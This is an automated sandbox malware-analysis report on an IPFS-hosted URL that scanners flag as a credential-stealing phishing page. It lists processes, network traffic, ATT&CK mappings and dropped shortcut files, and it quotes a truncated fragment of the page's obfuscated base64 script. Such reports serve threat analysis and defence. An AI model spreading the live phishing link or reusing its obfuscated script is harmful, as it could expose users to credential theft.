Edit tour

Windows Analysis Report
https://ipfs.io/ipfs/QmTvMGRn6QMQAMwSucv8UUTX3cyS4DrLuUTMvDui8TsJNN

Overview

General Information

Sample URL:	https://ipfs.io/ipfs/QmTvMGRn6QMQAMwSucv8UUTX3cyS4DrLuUTMvDui8TsJNN
Analysis ID:	1432047
Infos:

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

HTML page contains obfuscate script src

Stores files to the Windows start menu directory

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

chrome.exe (PID: 6756 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 1412 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2348,i,4983752092659349319,11854916774588587079,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ipfs.io/ipfs/QmTvMGRn6QMQAMwSucv8UUTX3cyS4DrLuUTMvDui8TsJNN" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://ipfs.io/ipfs/QmTvMGRn6QMQAMwSucv8UUTX3cyS4DrLuUTMvDui8TsJNN

SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Source: https://ipfs.io/ipfs/QmTvMGRn6QMQAMwSucv8UUTX3cyS4DrLuUTMvDui8TsJNN

HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKF8weDU3ZmE3YixfMHgyNWRkMGQpe2Z1bmN0aW9uIF8weDE3NjQ0NyhfMHg1MjQ0MjcsXzB4NGRhYTEyLF8weDNiMWRiYixfMHg0MzQwNjEsXzB4NGM2NzJlKXtyZXR1cm4gXzB4Mzk0OShfMHg0ZGFhMTItIC0weDFmNyxfMHg1MjQ0MjcpO312YXIgXzB4NTNjYzMwPV8weDU3Zm

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49725 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 23.193.120.112:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.193.120.112:443 -> 192.168.2.5:49718 version: TLS 1.2

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49725 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.120.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.120.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.120.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.120.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.120.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.120.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.120.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.120.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.120.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.120.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.120.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.120.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.120.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.120.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.120.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.120.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.120.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.120.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.120.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ipfs/QmTvMGRn6QMQAMwSucv8UUTX3cyS4DrLuUTMvDui8TsJNN HTTP/1.1Host: ipfs.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: ipfs.io
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: chromecache_62.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fABc4EsA.woff2)
Source: chromecache_62.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fBBc4.woff2)
Source: chromecache_62.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fBxc4EsA.woff2)
Source: chromecache_62.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCBc4EsA.woff2)
Source: chromecache_62.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCRc4EsA.woff2)
Source: chromecache_62.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fChc4EsA.woff2)
Source: chromecache_62.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCxc4EsA.woff2)
Source: chromecache_60.2.dr	String found in binary or memory: https://www.gstatic.com/recaptcha/releases/moV1mTgQ6S91nuTnmll4Y9yf/demo__ltr.css

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 23.193.120.112:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.193.120.112:443 -> 192.168.2.5:49718 version: TLS 1.2

Source: classification engine

Classification label: mal48.win@16/14@4/4

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2348,i,4983752092659349319,11854916774588587079,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ipfs.io/ipfs/QmTvMGRn6QMQAMwSucv8UUTX3cyS4DrLuUTMvDui8TsJNN"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2348,i,4983752092659349319,11854916774588587079,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://ipfs.io/ipfs/QmTvMGRn6QMQAMwSucv8UUTX3cyS4DrLuUTMvDui8TsJNN	0%	Avira URL Cloud	safe
https://ipfs.io/ipfs/QmTvMGRn6QMQAMwSucv8UUTX3cyS4DrLuUTMvDui8TsJNN	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.google.com	192.178.50.36	true	false	high
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	unknown
ipfs.io	209.94.90.1	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ipfs.io/ipfs/QmTvMGRn6QMQAMwSucv8UUTX3cyS4DrLuUTMvDui8TsJNN	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
192.178.50.36	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
209.94.90.1	ipfs.io	United States	40680	PROTOCOLUS	false

Private

IP
192.168.2.5

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1432047
Start date and time:	2024-04-26 10:58:55 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://ipfs.io/ipfs/QmTvMGRn6QMQAMwSucv8UUTX3cyS4DrLuUTMvDui8TsJNN
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal48.win@16/14@4/4

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.64.195, 192.178.50.46, 173.194.215.84, 34.104.35.123, 142.251.35.227, 172.217.15.202, 172.217.165.195, 52.165.165.26, 199.232.210.172, 23.45.182.68, 23.45.182.97, 192.229.211.108, 13.95.31.18, 20.242.39.171, 142.250.217.227, 72.21.81.240
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, a767.dspw65.akamai.net, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, update.googleapis.com, hlb.apr-52dd2-0.edgecastdns.net, www.gstatic.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, fonts.gstatic.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 07:59:46 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9746538066960375
Encrypted:	false
SSDEEP:	48:8nALdiTuakH+idAKZdA19ehwiZUklqehNy+3:8nx/Zqy
MD5:	D526CEFDDABB25C7478A430BF5F5C280
SHA1:	2BDA4D5B2807871809304ADADA61DDDB2C5800B8
SHA-256:	43F4B8355036AF415D3B3CF858B268DAA4BE608E4C2849C74B7D0F287E703E0F
SHA-512:	050D65FFEE01E3DF61780D470C8D98FAA4A1D077F74E7B99CFADFF9CC4BF89764B06B535AAB247B80D8D2A9A36990A9FAA411A1B5879D8E3B914EE23876FA024
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......w.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XtG....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XtG....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XtG....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XtG..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XxG...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............c......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 07:59:46 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.984636524379107
Encrypted:	false
SSDEEP:	48:8JdiTuakH+idAKZdA1weh/iZUkAQkqehay+2:8u/L9QDy
MD5:	5772D3E22FD0B68E7CF11D56A90A5F1A
SHA1:	6BBA23081D899950AE3CCA4BA805929F48B8CB65
SHA-256:	E5C500A8A7A63F4A9FBF50718F945E0DF911DBDBF139C5D133C960DB28E61AF0
SHA-512:	7E4EC40E180C48D63046905157D46C6BB3092DC37A3C0F7BC2DD09C7E82E95D8A00411DBC85DF00E3E39AED8DAEBC9C5C64A3E4411D677FDBD08FB21089DF36D
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....T m.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XtG....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XtG....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XtG....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XtG..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XxG...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............c......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	3.999064893339045
Encrypted:	false
SSDEEP:	48:8xDdiTuasH+idAKZdA14tseh7sFiZUkmgqeh7sQy+BX:8xQ/znuy
MD5:	2F20FBB498D66A65472A8C40D1928749
SHA1:	596649256508A59C829E62FA5EDADDF187E3D427
SHA-256:	38E45FCA72582BA824476B60E9C9D025C563DDD9B5DF4B97440201201AF66B17
SHA-512:	38ABFBF836BC7C1F5720383514BD19689BEF8C07BBB96E015F4A19FA44E791645DC56988773FBB67F06343FC95B698C1F591165B085B444AC2E557CD04D3AB9B
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XtG....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XtG....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XtG....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XtG..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............c......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 07:59:46 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9854295910039466
Encrypted:	false
SSDEEP:	48:8cdiTuakH+idAKZdA1vehDiZUkwqehWy+R:8B/IYy
MD5:	D500727E3D69AB994A1CE8FA3CA3595B
SHA1:	B653B7E0FCCF74CB2DFDE828D83BC1AAD73C6AB0
SHA-256:	34B49531709788DF0449DE46D37A74D18A89C7940E03DA81EF220D6820ECF935
SHA-512:	7E7173C7EB1561BC4B4928860A7E20DCF05B1AE1994178136906281D6DBCA6C5517A75C134478994F6AC9197D4AC21DBC4CA841A5B4417ADDC51A8ADF72FD0CB
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....2h.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XtG....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XtG....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XtG....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XtG..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XxG...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............c......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 07:59:46 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9762236069208035
Encrypted:	false
SSDEEP:	48:8KdiTuakH+idAKZdA1hehBiZUk1W1qehky+C:8v/Y9Ey
MD5:	7005020C50188E6D1FCF617630D8A1FD
SHA1:	4666C2D14412B92E10B75E372A13C3C6D5BBB7DF
